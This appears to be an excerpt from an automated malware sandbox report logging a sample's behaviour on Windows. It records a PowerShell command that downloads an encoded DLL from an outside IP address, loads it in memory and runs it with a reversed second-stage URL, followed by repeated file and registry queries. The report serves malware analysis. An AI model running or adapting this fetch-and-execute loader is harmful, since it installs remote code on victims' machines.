Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '%obzequio%';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/server/dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.fcc/222.37.522.581//:ptth')) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs